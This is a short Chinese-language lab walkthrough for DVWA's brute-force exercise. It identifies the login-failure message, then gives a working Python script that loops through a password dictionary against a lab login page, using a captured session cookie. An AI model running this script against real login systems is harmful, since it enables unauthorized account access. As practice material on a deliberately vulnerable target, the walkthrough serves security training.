进入靶场输入任意密码进行尝试

发现登陆失败的特征字：“Username and/or password incorrect”

推荐用谷歌浏览器，按F12继续查看请求地址、请求头参数等详细信息，着重关注是否需要Cookie

编写python脚本

import requests
# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=low; PHPSESSID=gcgc5dhp7ikcedlhojofijia44"
username = "admin"
# success为未知，但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"

count = 0

with open("./pswd.txt", 'r') as file:

    while True:
        # 按行读，避免用readlines()读取全部后导致占用太多内存
        line = file.readline()
        # 如果读到内容为空的行则结束
        if not line:
           break;
        # 每行结尾自带换行符需要去掉
        line = line.strip()
        # 发送请求
        count += 1
        response = requests.get(url = url,
                                params = {"username":username, "password":line, "Login":"Login"},
                                headers = {"Cookie":cookie})
        # 判断请求中有无特征字
        if failure in response.text:
            print("第"+ str(count) +"次尝试--失败：",line)
        else :
            print("第"+ str(count) +"次尝试--成功：",line)
            break;

准备字典

执行脚本

验证暴力破解的结果是否正确